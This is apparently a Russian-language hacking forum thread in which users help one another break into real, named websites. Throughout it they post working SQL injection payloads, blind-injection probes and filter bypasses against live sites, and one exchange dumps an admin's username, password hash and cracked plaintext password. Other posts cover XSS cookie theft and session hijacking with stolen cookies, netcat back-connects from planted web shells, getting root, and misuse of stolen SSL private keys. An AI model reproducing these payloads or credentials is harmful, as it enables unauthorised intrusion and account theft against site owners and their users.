union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

сокращать сам запрос, все двойные числа заменить на одинарные, ну т.е.

union+select+1,2,3,4,5,6,7,8,9,10,11,12,13

заменить на

union+select+1,2,3,4,5,6,7,8,9,0,1,2,3

для начала. Даже на этом пример съекономилось 4 символа

мы тут про вывод ;) :D

Вопрос: Если XSS был найден посредством подставления вот этого скрипта: "><script>alert(document.cookie)</script>
http://img12.imageshack.us/img12/7390/111jcm.th.jpg (http://img12.imageshack.us/my.php?image=111jcm.jpg)
то дальнейшие мои действия для изъятия куки у жертвы такиеже, как и в случае еслибы я уязвимость нашол вот этим скриптом: "><script>alert(XSS)</script> ???

Да.Такие-же действия.

Gorev
Не вполне понял вопрос.

Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):

1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)

========================

Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера

http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё

========================

Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает

token - параметр в адресной строке. Например так - http://localhost/phpmyadmin/index.php?db=mysql&token=206136e5c98e1cd2fa26fbd104ebc700

Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.

Ну,эт понятно... А почему не работает уязвимость в моей бд,непонятно.Вроде всё правильно делаю.


а ты в phpmyadminе залогинен?

Привет всем :) Ребят подскажите вот что:
Есть купи с другого компа, как их использовать?

В браузере вставляешь вместо своих куков на даном сайте и заходиш на него с сесией того, у кого ты их умыкнул...

а куда их вставлять? в строку броузера?

не встроку а в место где куки опера -->tools-->preferences-->advanced-->coockies-->manage coockies

Неет!
В опере:
Инструменты->настройки->дополнительно->cookie->управление cookie

понятно а в эксплолере?

%USERPROFILE%\Cookies

а где это в эксплолере искать? по подробней если можно :)

посмотрел ссылку почитал сделал как показанно но произошла ошибка((( не импортируется ни чего

искать не надо ничего - открой проводник, вбей в адресную строку %USERPROFILE%\Cookies и туда скопируй файлы куков своих

Версия 7
попугай нашел куда вставлять куки , а как пароли от сайтов узнать пробовал заходить на сайт с установленной кукой другого компа и ни чего не произошло.. Подскажите ?

опции безопасности на майл ру.
Запретить сохранять логин

Если опция "Запретить сохранять логин" включена, то сервер Mail.ru не будет запоминать и автоматически подставлять ваше учетное имя на странице входа в почтовую систему.
Запретить параллельные сессии

При включении опции "Запретить параллельные сессии" сервер Mail.ru будет обнаруживать двух и более одновременно работающих пользователей под одним учетным именем. Если это произойдет, сервер заблокирует более раннюю сессию.
Показывать информацию о последнем входе в систему

Включение опции "Показывать информацию о последнем входе в систему" позволит вам узнать, когда и с какого IP-адреса происходило последнее обращение к вашему почтовому ящику. Данные по входам через веб-интерфейс (HTTP) обновляются в режиме on-line (т.е. во время каждого следующего входа Вы увидите дату, время и IP-адрес предыдущего входа). Данные по входам через почтовые программы (РОР3) обновляются один раз в сутки (т.е. во время каждого входа Вы увидите дату, время и IP-адрес последнего входа за предыдущие сутки).
Использовать cookie для авторизации

Опцию "Использовать cookie для авторизации" предпочтительно не выключать. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. Выключение этой опции нарушает безопасность, так как позволяет передавать информацию на чужие сайты. Выключать ее стоит только при "попадании" в чужой п/я (данная ошибка обычно возникает при неправильно настроенном proxy-сервере).
Сессия только с одного IP-адреса

Опцию "Сессия только с одного IP-адреса" предпочтительно включать всегда. Включение этой опции позволяет системе сохранять сессию в данном п/я, при этом не нарушая безопасности этого п/я. При включении этой опции проверяется, что все запросы в сессии идут с того же адреса, с которого она началась, если не с того, то сессия считается неправильной - и отправляет на авторизацию. Выключать опцию стоит только если Вас регулярно "выбрасывает" из п/я на авторизацию.

ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?

ааа то есть не покаждой куке можно узнать , а есть ли программы может в которую забиваешь куку и она выдает пароль?
http://www.citforum.ru/internet/html/cookie.shtml
http://www.nirsoft.net/web_browser_tools.html

Пипл,нашёл папку на машине:

/usr/local/apache/etc/ssl.all

Там сертификационные файлы server.crt,server.key,mail.crt,mail.key,webmail.cr t,webmail.key... Чё с инми делать не пойму.Ключи там под RSA и приватные к тому же.С SSH-то понятно,а вот с SSL ещё дел не имел ).Мб кто подскажет,что надо делать,какие проги нужны ?

/usr/local/apache/etc/ssl.all
Мб кто подскажет,что надо делать,какие проги нужны ?

Хм... А что ты собрался делать?

Я так понимаю в этой папке лежат ключи, которые позволяют пользователям сайта/ов заходить на них, используя зашифрованное соединение ssl - это когда в адресной строке не http:// а https://. В этом случае трафик шифруется. Ключи выдаются специальными, уполномоченными на то, центрами сертификации.

Наличие сертификата сервера, если я не ошибаюсь, позволяет тебе провести атаку "человек по середине". Но не думаю, что если ты задаешь подобный вопрос, то тебе оно надо...

Помогите разобраться!
Запрос такой
?cu=TT<script>alert('ok')</script>
вылитело окно -- ок

На странице появилось
Error in query
SELECT qnty_ FROM currency WHERE crncy='TT' ORDER BY date_ DESC LIMIT 1
1064: You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1

Вот мучаю скуль и никак пройти в перед не могу.
через order+by показывает 1 поле.

?cu=TT%27+union+select+111/*
You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1

?cu=TT%27%2520union%2520select%2520null/*
Unknown column '20union' in 'where clause'

?cu=TT%27+and+(select+111)/*
You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551

Сервер фильтрует / попробуй 1' UNION SELECT 1 --

Или стучись помогу 486503551


здесь проблема в другом.
/* -- # без разници ошибка одна и таже.
как я понял тут только подзапросами можно.
но никак немогу и их использовать.

2 1west урлу в студию , поможем

select qnty_ from currency where crncy='('ok')' order by date_ desc limit 1
=> You have an error in your SQL syntax near 'ok')' ORDER BY date_ DESC LIMIT 1' at line 1
select qnty_ from currency where crncy='1' order by 1/* order by date_ desc limit 1
=> "через order+by показывает 1 поле."
select qnty_ from currency where crncy='1' union select 1/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'union select 111/*' ORDER BY date_ DESC LIMIT 1' at line 1
select qnty_ from currency where crncy='1' and (select 111)/* order by date_ desc limit 1
mysql 3* => You have an error in your SQL syntax near 'select 111)/*' ORDER BY date_ DESC LIMIT 1' at line 1

хекерская догадка 45% (с)

http://www.prazdnik.by/calendar/?day=-1%27

Вот, инъекция есть, но немогу расковырять, чтобы не запрашивал не работает :(

[You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Март')))) ORDER BY BE.SORT asc' at line 1]

Кавычки слешируються
'-1\\''))
фигасе запрос, походу автоматом(аля ORM-генерация) формируеться.

т.е. нельзя инъекцию провести?

Можно, просто внимательно читай, что про синтаксис пишется.

:( можешь объяснить? а то я нуб полный :(

http://www.prazdnik.by/calendar/?day=-12'))))+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7--+&month=3&year=2009

о, спасибо большое, сам бы ни за что не догадался, я за всю жизнь ток 1 инъекцию сделал, даже шелл залил оО, спс

Это ниже 4 версии или я не правильно подобрал кол. выводимых колонок, потому как union не канает?
http://flb.ru/?path=81&message_id=40+group+by+8--+

пятая ветка:


http://flb.ru/?path=81&message_id=40+and+substring(version(),1,1)=5

возможно какая то фильтрация :


http://flb.ru/?path=81&message_id=123+union%0Aselect+1,2,3,4,concat_ws(0x 3A,user(),version(),database()),6,7,8--+

собственна давно интересует ламерский вопрос .
есть два ресурса( хостинга ) на обоих у меня залиты шеллы

1.

Software: Apache/2.0.59 (Unix). PHP/4.4.7

uname -a: FreeBSD ----------------- 6.2-RELEASE-p7 FreeBSD 6.2-RELEASE-p7 #0: Sat Aug 4 16:06:27
CEST 2007 root@--------.com:/usr/obj/usr/src/sys/1850 i386

uid=80(www) gid=80(www) groups=80(www)

Safe-mode: OFF (not secure)


2.

Software: Apache. PHP/5.2.6-1 uname -a: Linux 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure)

вот собственна ...
А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
Есть хостинг покупной,Смотрел видео как коннектятся через Putty на домен ,ожидают бек коннекта ,биндят в шелле порт и подключаются и как там работает неткат . Попробовал на своем хосте на firstvds.ru - не работает . Нигде фака по инсталлу на сервер нетката не нашел поиск не рулит.
И второй вопрос - какой софт под эти оси нужен?
В обоих сервисах есть права на запись .
Нужен root.
Спасибо.

А теперь вопрос - как пользоваться NetCat если у меня не выделенный айпи
бери ссх(можно попросить у знакомых, если нету), и там неткат на прослушку порта(nc -l -p порт ) и бекконекти (я через шелл от рст это делаю)

#4. Установка.. мде.. тут нужен рут :]
А вот если на ссх нетката нету, то не обязательно устанавливать, можно скомпилить и запускать потом ./netcat -l -p порт

http://www.theglobalreport.org/print.php?news_id=100'

Блин опять запариваюсь на скуле
Помогите с подбором

http://www.theglobalreport.org/print.php?news_id=100'

Блин опять запариваюсь на скуле
Помогите с подбором
http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22+--+

http://www.theglobalreport.org/print.php?news_id=-100'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22+--+

Ок спасибо

http://www.skai.gr/master_story.php?id=113998%27

Тут возможна иньекция?
Когда подставляю id=-1+union+select+1,2--
То пишет не найдено

ветка 4
http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4

Фильтрация union, select

http://www.skai.gr/master_story.php?id=113998+and+substring(version() ,1,1)=4/*select*/

PS. diznt давай уже что-то читать начни, а не только писать, всё это в статьях изложено и трудностей вызывать не должно, ты ведь не первый день на форуме

Вот еще такой вопрос (правда не по уязвимостям)
Если я к примеру сижу через чужой логин в инете
то как меня вычеслят? ну я имею ввиду что корбина узнает что мол кто то сидит с акка и как они меня будут искать? я понимаю что там у них мой адрес где я проживаю
но все таки интересует как они узнают что с этого адреса где я прожимаю сидели под чужим логином?

diznt, с корбиной не знаком, но разве у тебя нет локального адреса, под которым ты заходишь в инет?

mailbrush мне нужно подключаться самому

Эм.. Но ведь локалка есть? Если да - тебя вычислят по твоему внутреннему айпи.

http://tksavelovskiy.ru/actions.html?s=3&a=34073'&page=1

Jokester твои мысли?

я хоть и не великий и могучий Jokester но выскажу свое пмсм - не факт что там sql injection или вообше есть какая то уязвимость,никакие логические конструкции не проходят, значит по всей видимости в $_GET['a'] заноситься значения только если $_GET['a'] int (например $_GET['a']=is_numeric($_GET['a']) ? $_GET['a'] :1; ну или что типа такого) , а то что неустановлены индексы у массивов так вполне возможно что mysql_fetch_assoc и потом в скрипте идет обрашения к индексам без проверки их существования. Короче похоже на какую то логическую ошибку в скрипте.

Если на сайте есть SQL-inj но не выводится ошибка...то как-то можно обойти?


А точнее если вызываю нарушение запроса таким способом 1' то выходит ошибка (похоже SQL класс подключен) ошибка ссылается на WHERE id='1''

( 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1 )

А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?

ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.

ну наверно стоит закрывать остальной запрос коментами, самым простым способом 1'+order+by+1--+(/*,%23), а вообще линк в студию, ну а вообще я не вижу в чем проблема, наверно все таки стоит начать читать статьи.

Проблема то в том что ошибка не выводится....
А запрос проходит отлично.

теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/

уж как я не извививался ничего не выходит

А если прописываю так 1'+or+'2 то запрос нормально выполняется...
Как можно попробовать провести инъекцию?

если комментарии поставить не удается. в чем я все таки сомневаюсь. можно работать как со слепой инъекцией
1'+and+substring(version(),1,1)=3+or+'2
Итд
хотя конечно бред ((

конструкция id='1' or '2' - нежизнеспособна.

теперь от меня глупый вопрос, что здесь можно придумать
http://ozpp.ru/sovet/lesnyak'/

уж как я не извививался ничего не выходит

тут ничего нет.

зы постом ниже лайт показал инъект, НО в ФФ3 я его не вижу (х_х)
в остальных браузерах ошибки итд. а в фф просто "страница не найдена."

поговорить об этом можно тут https://forum.antichat.ru/thread111019.html

тут ничего нет.
вобщем, http://ozpp.ru/sovet/lesnyak'/**/union/**/select/**/1,2,3,4,5,6,7,user(),9,10,11,12/*

У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)

http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?

http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?
Таблица находиться в другой БД

http://www.rfbd.ru/

В общем из information_schema.tables вытягиваю нахожу таблицу jos_users. Далее делаю запрос WHERE+TABLE_NAME=0x6a6f735f7573657273

вот код:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,column_name,10,11 ,12,13,14,15,16,17,18,19,20+from+information_schem a.colu mns+where+table_name=0x6a6f735f7573657273+limit+4, 1&region=72&rubrika=10
Оттуда с помощью LIMIT нахожу username, email, password.

Далее:
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,username,10,11,12 ,13,14,15,16,17,18,19,20+from+jos_users+limit+1,1&region=72&rubrika=10
И появляется ошибка. Что не так сделал?

Проверил... Там только две ДБ: a1rfbd_ric_datebase и test... Ни в одной jos_users не подходит. А вообще разве это Joomla? Да и папка /administration/ нету. Ищи другие таблицы...

Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц? То есть когда я использовал table_name, было около 50 таблиц! Админ мог использовать какое-нибуть "левое" название для нужной мне таблицы, а найденную мной сделать "фейком"??

У меня такой же вопрос как и у Tigger, если какой то способ кроме /**/ заменить пробелы, а то при чпу выходит фигня -
http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'/
? И почему вот такой финт не проходит

http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'%2f**%2forder%2f**%2fby%2f **%2f1/

@EmIL

test.jos_users=>id
test.jos_users=>name
test.jos_users=>username
test.jos_users=>email
test.jos_users=>password
test.jos_users=>usertype
test.jos_users=>block
test.jos_users=>sendEmail
test.jos_users=>gid
test.jos_users=>registerDate
test.jos_users=>lastvisitDate
test.jos_users=>activation
test.jos_users=>params


Иногда БД test просто фейк

http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,us ername,password,email),10,11,12,13,14,15,16,17,18, 19,20+from+test.jos_users

Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц?


1) ДБ узнается через table_schema
2) Можно искать таблицы по именам полей, т.е. ПРИМЕР: 1,2,table_name,4,5+from+information_schema.tables+ where+column_name+like+'%user%'.

У меня в городе есть хороший кинотеат - кронверксинема и я давно на их сайте нашел скулю) Но все никак не могу раскрутить до конца...
Решил тут вот запостить.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,4,5,6,7/* - это то до чего я добрался. Ошибка осталась, но при другом кол-ве полей еще одна ошибка вылезает => запрос правильный. Но выводимых полей нету... Чего я только не пробывал)
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,version(),5,6,7/*
смотрим свойста имега(путь к картинке)
версия 5.0.21

2 Tigger

http://kronverkcinema.ru/repertoire/movies/watchmen'/**/UNION/**/SELECT/**/1,2,3,(SELECT/**/CONCAT_WS(0x3a,u_login,u_password)/**/FROM/**/kronverk.0users/**/LIMIT/**/1,1),5,6,7/*

[0]:0admin:cb9bfe903a233a5e3e5db91f557efa49
[1]:user1:ae1276475fe133abcc93dff6bebc9413

Пароль не найден в паблик базе,
на passcracking.ru не найден

http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,concat_ws(0x3a,id,u_login,u_password),5,6,7/**/from/**/0users/* - докрутил сам уж тут)
0admin:cb9bfe903a233a5e3e5db91f557efa49:vjhrjlfd
user1:ae1276475fe133abcc93dff6bebc9413:kronverk123

Вот так вот =)

Но к сожелению к /admin/ доступ запрещен =(
И фтп нету =(
Сейчас попробую через ssh и удаленно к БД можно попробывать

ЗЫ: Всем спасибо за помощь)

http://adena.ru/checkout.html?id=1'


Не могу, решил выложить...

http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9

http://striweb.si.edu/esp/tesp/details.php?id=-1378+or+1=1/*
думаю 3 ветка. ( пр9

Ну да..

http://striweb.si.edu/esp/tesp/details.php?id=1378+and+substring(version(),1,1)=3


http://adena.ru/checkout.html?id=1'


Не могу, решил выложить...

http://adena.ru/checkout.html?id=1'+and+substring(version(),1,1)=5/*

http://www.msm-5.ru/news.phtml?sid=79&nid=57 - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57/**/ - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57-2 - стр. 55

Это инъекция, но кол-во не могу подобрать - дошел до 20.

http://www.msm-5.ru/news.phtml?sid=79&nid=57 - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57/**/ - стр. 57
http://www.msm-5.ru/news.phtml?sid=79&nid=57-2 - стр. 55

Это инъекция, но кол-во не могу подобрать - дошел до 20.

3-ья ветка

http://www.msm-5.ru/news.phtml?sid=79&nid=57+and+substring(version(),1,1)=3

Ну да..




Ничего же не происходит? где должен высветится ответ от SQL?

Ничего же не происходит? где должен высветится ответ от SQL?

Это называется блинд инъекция..

Подробнее можно почитать, например, тут (http://forum.blackhack.ru/showthread.php?p=2141) .

Эм.. Крут. А во что енкодятся буквы? (ну типа символ = числу (скажите что за енкодинг))

2 Byrger почитай про слепые скули

http://forum.antichat.ru/thread19844-blind+sql.html


2 mailbrush если я правильно тебя понял то это char
http://www.webfuture.ru/igo/convert.php

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or entities.description like '%1'%') and (entities.keyword
Если переменная не фильтруется и включено сообщение о выводе ошибки. В моём случае возможно ченють вывести? При этом сообщение.

Расскажите как можно добавить несколько одинаковых сайтов?
http://1xx.ru/1x9
http://s51.radikal.ru/i133/0903/26/d6c6613a39f9t.jpg (http://s51.radikal.ru/i133/0903/26/d6c6613a39f9.png)

S0ulVortex

А как по твоему по ошибке можно сказать о наличии или отсутствие вывода?
Со 100% уверенностью нельзя даже сказать, есть там скуль или нет. Хотя. думаю, что есть и запрос будет примерно такой:
1') order by 1/* но это лишь предположение

KPbIBe[D]Ko

Мне надоело тереть твои посты. Прочти правила форума, раздела, темы, ПМ. Хоть что-нибудь прочитай. Просьбы о взломах, о поиске багов, сюда постить не надо. Здесь разбирают конкретные уязвимости УЖЕ найденные. По которым необходима какая-либо помощь

S0ulVortex

А как по твоему по ошибке можно сказать о наличии или отсутствие вывода?
Со 100% уверенностью нельзя даже сказать, есть там скуль или нет. Хотя. думаю, что есть и запрос будет примерно такой:
1') order by 1/* но это лишь предположение




Я не уверен, но интуиция подсказывает что такая ошибка на столь значительном проекте это уже просто недочет о котором не заметили и по этому я так уверенно задал вопрос а вдруг прокатит.
А вот что ещё заметил это получается в поиске при добавление кавычки ( ' ) вылетает такое сообщение. Еслиже писать любой текст или ещё че он пишет типа ничего не найдено.
Заметил ещё ошибка меняется если ставить просто ( ' )
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 6
А если к примеру поставить такое ( ' -- )
Ошибка такая
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or entities.name like '%--%' or entities.description like '%
А при ( ') order by 1/* )
выводит такую ошибку
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')%' or entities.description like '%1')%') and (entities.keyword

А если ставить ( ' ' ) то ошибка пропадает

Здорово конечно, но еще здоровее будет, если будет ссылка

Здорово конечно, но еще здоровее будет, если будет ссылка
А если она выводит а я паблик выложу как то не хорошо получится. Закроют и все.

S0ulVortex
1%') order by 1/*
попробуй просто интересно,что ответит

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')%') and (entities.keywords like '%order%' or entities.name li
Дальше невидно и в исходнике обрывается
Сразу говарю недавно заметил что это оказывается строка поиска и если в ней ввести ( ' ) вылезает такая ошибка которую я выше писал.

Кавычки ставлю в 1 поле. http://i027.radikal.ru/0903/5d/a825cc03c2ec.jpg
похоже на то что после 1') ничего в запрос не пошло, може после пробыла все режеться, попробуй
1%')/**/order/**/by/**/1/*

похоже на то что после 1') ничего в запрос не пошло, може после пробыла все режеться, попробуй
1%')/**/order/**/by/**/1/*
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order/**/by/**/1/*%' or entities.description like '%1%')/**/ord
Вот че выводит

Возможно что тот запрос в котором ошибка вставляеться значения из другого запроса или это переменая вставляеться несколько раз, но самое плохое судя по ответу почему то что не проходит финт с коментом /*, то есть остальной запрос не закрываеться(и вполне возможно что запрос многострочный и -- и # не проканает), если бы видеть всю ошибку.

Возможно что тот запрос в котором ошибка вставляеться значения из другого запроса или это переменая вставляеться несколько раз, но самое плохое судя по ответу почему то что не проходит финт с коментом /*, то есть остальной запрос не закрываеться(и вполне возможно что запрос многострочный и -- и # не проканает), если бы видеть всю ошибку.
Да вот я тоже хотел бы увидеть полностью но он режит и в исходнике режит

Ну скинь ты ему ссылку в личку, весь форум потянули при моём даже разрешении

Народ а че все прицепились к order может есть какие идеи через другое ченють. Может че то с оператором like тут связанно?

Вот ещё при ( ' order by 1/* ) выводит
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'order%' or entities.name like '%order%' or entities.description
Если смотрять концовку то тут видео name like '%order%' or entities.description А в остольных он выводил до name li это по моему и есть продолжение всех выводов заканчивающихся на name li.

P.s если кто хочет помочь чтобы не ждать и не засорять форум стучите в аську 1106663

Cудя по всему входная переменая которая вставляестся в запрос дробиться по пробелам на составляюшии, да и не узаю ff 3 ветки для sql injection.

AkyHa_MaTaTa
походу прав,типо поиск по словам.... если б как-то обрезать запрос дальше...

может кто ткнет в носом с статью в которой расматривается октрытие порта на удаленном сервере, конект к данному порту неткатом. и т..д..
(зі ткните в меня этим неткатом, поиск дает лишь кмс неткат)

к сожалению кроме двух видео ничего не нашел.
спасибо.

а как тут узнать количество столбцов?
http://mega-porno.ru/video.php?category=1'

переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.

переменая вставляеться в 2 запроса а потом еще и на оснавании этих зопросов какое то значения вставляеться в 3 запрос(а может дальше еще в один) или например проверка на is_numeric в 3 запросе.

Ты правда думаешь, что это ему что-то даст?

2TELO:

http://mega-porno.ru/video.php?category=1')+order+by+1--+

5-ая ветка:

http://mega-porno.ru/video.php?category=1'+and+substring(version(),1,1) ='5

а как тут узнать количество столбцов?
http://mega-porno.ru/video.php?category=1'


http://forum.antichat.ru/showpost.php?p=1118647

Ровно месяц прошел )

Нашёл багу, всё стандартно "You have an error in your SQL syntax",но при подборе столбцов order by вместо Unknown column '100' появляется Unknown column 'foto2' in 'field list'.
Как быть?

Скинуть ссылку..

Ничего не получал, отошли ещё раз.
Скинул в пм.

Остальным желающим в пм могу скинуть.
кидай

Расскажите как можно добавить несколько одинаковых сайтов?
http://1xx.ru/1x9
http://s51.radikal.ru/i133/0903/26/d6c6613a39f9t.jpg (http://s51.radikal.ru/i133/0903/26/d6c6613a39f9.png)

Нет идей??

С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world


версия - 1 or 1=@@version--
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблицы'))--

Проблема в том что запросы такого видв не проходят.
http://darkomen.ru/?go=19&indx=2980+union+select+1,2,@@version,4,5,6,7,8,9,0 ,11,12--
Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
Плиз скажите как с ними работать и что полезного и как из них взять.
Не могу понять почему удаляют пост я не там пишу что ли? Просто очень интересная для меня тема перечитал все мануалы которые нашел. но не могу понять как сделать помогите кто нить пожалусто.

Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.

Imperou$, там функции mysql_result() передается пустой результат от запроса. От того и ошибка


fedi, доступа к базам л2-сервара нету

http://darkomen.ru/?go=19&indx=-1+union+select+1,2,3,4,5,6,7,8,9,1,1,1+from+lin2db .user_account

Его как правило и не бывает. С этими базами работает непосредственно л2-сервер

Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?

мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?

Не получается раскрутить
http://www.carochasolicar.com/detalhesp.php?tipo=4'
Двойной запрос? Попробуйте плз, кому не лень.

по моему это просто раскрытие пути и вовсе не скуля

мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
нету там фильтра на from
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,3,4,5,6,7,8,9,1,1,1+from+IN FORMATION_SCHEMA.TABLES--

Подобрал поля, (25) через 'order+by', но при попытке вывести выводимое, тупо not found.Видимо фильтруется union или select.
Версия пятая.

http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=141060+and+substring(version(),1,1)=5--&totalItems=3709&pageID=2

что можно сделать? Очень нужен совет.